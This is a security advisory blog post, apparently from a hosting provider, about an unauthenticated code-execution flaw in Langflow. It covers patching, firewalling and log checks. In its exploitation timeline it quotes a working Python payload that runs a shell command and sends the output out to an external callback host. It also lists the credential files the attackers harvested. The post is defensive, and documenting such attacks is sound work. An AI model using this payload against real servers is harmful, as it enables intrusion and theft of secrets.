On March 17, 2026, a critical remote code execution vulnerability was disclosed in Langflow, the popular open-source visual AI workflow builder with over 145,000 GitHub stars. Within 20 hours — before any public proof-of-concept code even existed — attackers were already exploiting it in the wild. CISA has added CVE-2026-33017 to the Known Exploited Vulnerabilities (KEV) catalog with a federal remediation deadline of April 8, 2026.

If you self-host Langflow on a VPS or bare-metal server, you need to act now. Here is everything you need to know: what the vulnerability does, how attackers are using it, and exactly how to lock down your instance.

What Is Langflow?

Langflow is a Python-based, open-source framework that lets developers build AI agents and retrieval-augmented generation (RAG) pipelines using a drag-and-drop visual editor. Instead of writing complex orchestration code, you arrange components — prompts, models, vector stores, data connectors — on a canvas and wire them together.

It is popular with data science teams, solo developers, and small companies building AI-powered automation. Many self-hosters deploy it on a Cloud VPS alongside tools like n8n and Ollama. Langflow also offers a managed cloud version through DataStax, but the self-hosted deployments are the ones most at risk from this CVE.

CVE-2026-33017: The Technical Breakdown

CVSS Score: 9.8 (Critical, CVSS 3.1)
Type: Unauthenticated Remote Code Execution
Affected Versions: All versions before 1.9.0 (including 1.8.2, which was incorrectly reported as patched)
Fixed In: Langflow 1.9.0+

The vulnerability lives in the POST /api/v1/build_public_tmp/{flow_id}/flow endpoint. This endpoint is designed to let unauthenticated users build “public flows” — a legitimate Langflow feature for sharing workflows. The problem: it accepts attacker-supplied flow definitions containing arbitrary Python code in node definitions, and the server executes that code without any sandboxing.

A single HTTP POST request with a crafted JSON payload is all it takes. No authentication. No credential guessing. No multi-step exploit chain. The attacker sends a flow definition with malicious Python embedded in a component node, and Langflow compiles it into an AST module and passes it directly to Python’s exec() function.

Why the “Fixed” Version 1.8.2 Was Still Vulnerable

This is the second time Langflow has been hit through the same exec() call pattern. A predecessor vulnerability, CVE-2025-3248, was patched by adding authentication to the affected endpoint. But the underlying unsandboxed code execution mechanism was never addressed — the developers gated access instead of fixing the root cause.

When a researcher examined the public flow endpoint (which cannot require authentication by design), they found the exact same execution pipeline. Version 1.8.2 shipped a partial fix that was confirmed by JFrog to still be exploitable. Only version 1.9.0 properly addresses the vulnerability.

How Attackers Exploited It in 20 Hours

According to Sysdig’s threat research team, attackers moved through three distinct phases after the advisory was published on March 17 at 20:05 UTC:

Phase 1: Automated Scanning (Hours 20–21)

Nuclei scanner templates appeared within hours. Attackers scanned the internet for exposed Langflow instances, using interactsh callback domains to confirm vulnerable targets. Scanning requests included telltale indicators like Cookie: client_id=nuclei-scanner and flow names like nuclei-cve-2026-33017.

Phase 2: Reconnaissance and Exploitation (Hours 21–24)

Custom Python-based exploits followed the scanners. Attackers executed system commands (id, ls, cat /etc/passwd) to profile compromised hosts. Payloads used a consistent pattern:

_r = __import__('os').popen('id').read()
_enc = __import__('base64').b64encode(_r.encode()).decode()
__import__('urllib.request').request.urlopen('http://callback.oast.live//' + _enc)

This executes a system command, base64-encodes the output, and exfiltrates it over HTTP to an attacker-controlled callback server.

Phase 3: Credential Harvesting (Hours 24–30)

Once inside, attackers targeted the most valuable data on any AI workflow server: the secrets that power it. They extracted:

  • .env files containing API keys for OpenAI, Anthropic, AWS, and other services
  • .db files with stored flow definitions and embedded credentials
  • Environment variable dumps exposing database connection strings
  • /etc/passwd and /etc/shadow for lateral movement

Stage-2 payloads were served from attacker infrastructure, indicating that initial access was being converted into persistent backdoors.

Step-by-Step: How to Secure Your Langflow Instance

1. Check Your Current Version

# If installed via pip
pip show langflow | grep Version

# If running in Docker
docker exec langflow pip show langflow | grep Version

# Check the web UI
# Navigate to Settings → About in the Langflow dashboard

If you are running any version below 1.9.0, you are vulnerable — including 1.8.2.

2. Upgrade to Langflow 1.9.0+

# pip upgrade
pip install langflow --upgrade

# Docker upgrade
docker pull langflowai/langflow:latest
docker compose down && docker compose up -d

# Verify the new version
pip show langflow | grep Version

3. Disable Auto-Login Immediately

Langflow ships with AUTO_LOGIN=true by default, which generates a superuser token without requiring authentication. Set it to false:

# In your .env or docker-compose.yml environment block
# (Langflow reads its settings from environment variables with the LANGFLOW_ prefix)
LANGFLOW_AUTO_LOGIN=false
LANGFLOW_SUPERUSER=admin
LANGFLOW_SUPERUSER_PASSWORD=<strong-random-password>

4. Rotate All Secrets

If your Langflow instance was ever exposed to the internet before patching, assume your secrets are compromised. Rotate:

  • All LLM API keys (OpenAI, Anthropic, Cohere, etc.)
  • Database connection strings and passwords
  • Cloud provider credentials (AWS, GCP, Azure)
  • Any API keys stored in .env files or Langflow’s credential store

5. Put Langflow Behind a Reverse Proxy

AI workflow tools should never be exposed directly to the internet. Place Langflow behind a reverse proxy with authentication. Caddy is the fastest option for self-hosters since it handles TLS automatically:

# Caddyfile with basic auth
# Generate the bcrypt hash with: caddy hash-password
# (Caddy 2.8+ spells the directive basic_auth; basicauth is still accepted)
langflow.yourdomain.com {
    basicauth {
        admin $2a$14$hashed_password_here
    }
    reverse_proxy localhost:7860
}

For more advanced setups, consider a WireGuard VPN tunnel so Langflow is only accessible from your private network.

6. Restrict Network Access

# UFW: allow only your IP (ufw evaluates rules in order, so the allow must come before the deny)
sudo ufw allow from YOUR_IP to any port 7860 proto tcp
sudo ufw deny 7860/tcp

# iptables equivalent (ACCEPT must precede DROP for the same reason)
iptables -A INPUT -p tcp --dport 7860 -s YOUR_IP -j ACCEPT
iptables -A INPUT -p tcp --dport 7860 -j DROP

# Note: a port published by Docker (-p 7860:7860) is handled by Docker's own
# iptables chains and bypasses these rules; bind it to loopback instead
# (-p 127.0.0.1:7860:7860) so only the reverse proxy can reach it.

7. Check for Indicators of Compromise

Search your access logs for signs of exploitation:

# Check for exploit attempts against the vulnerable endpoint
grep -i "build_public_tmp" /var/log/nginx/access.log

# Look for nuclei scanner fingerprints
grep -i "nuclei-scanner" /var/log/nginx/access.log

# Check for python-requests user agent (common in custom exploits)
grep "python-requests" /var/log/nginx/access.log

# Monitor outbound connections to known C2 infrastructure
ss -tnp | grep -E "(143.110.183.86|173.212.205.251)"
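The grep commands above find individual hits; the following added example (not from the original post) applies the same indicators from Phases 1 and 2 to nginx access-log lines and tallies hits per source IP, so a burst of POSTs to the public-flow endpoint from one address stands out. The sample log lines are constructed, and the optional trailing cookie field assumes an nginx log_format extended with $http_cookie.

```python
import re
from collections import Counter

# Indicators named in the post: the vulnerable endpoint, the nuclei scanner
# fingerprints and the python-requests user agent seen in custom exploits.
VULN_ENDPOINT = re.compile(r"^/api/v1/build_public_tmp/[^/]+/flow")
NUCLEI_MARKERS = ("nuclei-scanner", "nuclei-cve-2026-33017")
# nginx "combined" format plus an optional trailing quoted field for the Cookie
# header (assumes log_format was extended with $http_cookie; otherwise absent).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"(?: "(?P<cookie>[^"]*)")?'
)

def classify(line):
    """Return indicator tags for one access-log line (empty list if clean)."""
    m = LINE_RE.match(line)
    if not m:
        return []
    tags, path, cookie = [], m["path"], m["cookie"] or ""
    if m["method"] == "POST" and VULN_ENDPOINT.match(path):
        tags.append("vuln-endpoint")        # legitimate public flows hit it too: review
        if m["ua"].startswith("python-requests"):
            tags.append("python-requests")  # fingerprint of the custom exploits
    if any(mk in path or mk in cookie for mk in NUCLEI_MARKERS):
        tags.append("nuclei-scan")
    return tags

def scan(log_text):
    """Scan raw log text; return (list of (ip, tags), hit count per source IP)."""
    findings, per_ip = [], Counter()
    for line in log_text.splitlines():
        tags = classify(line)
        if tags:
            ip = line.split(" ", 1)[0]
            findings.append((ip, tags))
            per_ip[ip] += 1
    return findings, per_ip

# Constructed sample log (documentation-range IPs, made-up timestamps and flow ids).
SAMPLE_LOG = """\
203.0.113.7 - - [18/Mar/2026:16:12:03 +0000] "POST /api/v1/build_public_tmp/3f2a/flow HTTP/1.1" 200 512 "-" "python-requests/2.31.0"
198.51.100.22 - - [18/Mar/2026:16:09:41 +0000] "GET /api/v1/flows/ HTTP/1.1" 200 88 "-" "Mozilla/5.0"
203.0.113.9 - - [18/Mar/2026:16:05:10 +0000] "POST /api/v1/build_public_tmp/nuclei-cve-2026-33017/flow HTTP/1.1" 500 0 "-" "Go-http-client/1.1" "client_id=nuclei-scanner"
203.0.113.7 - - [18/Mar/2026:16:12:30 +0000] "POST /api/v1/build_public_tmp/3f2a/flow HTTP/1.1" 200 512 "-" "python-requests/2.31.0"
"""
if __name__ == "__main__":
    for ip, tags in scan(SAMPLE_LOG)[0]:
        print(ip, ", ".join(tags))
```

Run it against a real log with `scan(open("/var/log/nginx/access.log").read())`; a "vuln-endpoint" hit alone is not proof of compromise, but one combined with a nuclei or python-requests tag from an address you do not recognise is.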

The Bigger Picture: AI Tools Are the New Attack Surface

CVE-2026-33017 is not an isolated incident. It follows the same pattern we documented in the n8n critical CVE chain: AI workflow tools that treat code execution as a convenience feature rather than a security boundary.

The 2026 OWASP Top 10 explicitly warns that “a code-generating agent running output in an unsandboxed environment gives attackers a direct path to RCE.” Langflow, n8n, LangChain, MetaGPT, AutoGen, and SWE-Agent all execute code via subprocess or exec(). If you run any of these tools on your server, the same hardening principles apply.

The time-to-exploitation window has collapsed. In 2023, critical vulnerabilities typically had weeks before active exploitation. In 2026, you have hours. CVE-2026-33017 was weaponized before a public PoC even existed — attackers reverse-engineered working exploits directly from the advisory text.

Quick Reference: Your Remediation Checklist

Action                                   Priority   Time
Upgrade to Langflow 1.9.0+               Critical   5 min
Set AUTO_LOGIN=false                     Critical   2 min
Rotate all API keys and secrets          Critical   15 min
Add reverse proxy with auth              High       20 min
Restrict firewall to known IPs           High       5 min
Check logs for IOCs                      High       10 min
Audit other AI tools for same pattern    Medium     30 min

Next Steps

The CISA KEV deadline is April 8 — one week from today. Federal agencies are required to patch by then, but every self-hoster should treat this as their personal deadline too. If your Langflow instance has been internet-facing at any point since March 17, the safest assumption is that it has already been probed.

For self-hosters building AI workflows on a VPS, Canadian Web Hosting’s Cloud VPS plans include full root access and the firewall control you need to properly isolate tools like Langflow. Combined with Managed Support, you get help configuring reverse proxies and network segmentation so your AI stack stays secure.

Patch today. Rotate your secrets. Put your AI tools behind authentication. The 20-hour exploitation window is already closed — and your data may already be on the other side of it.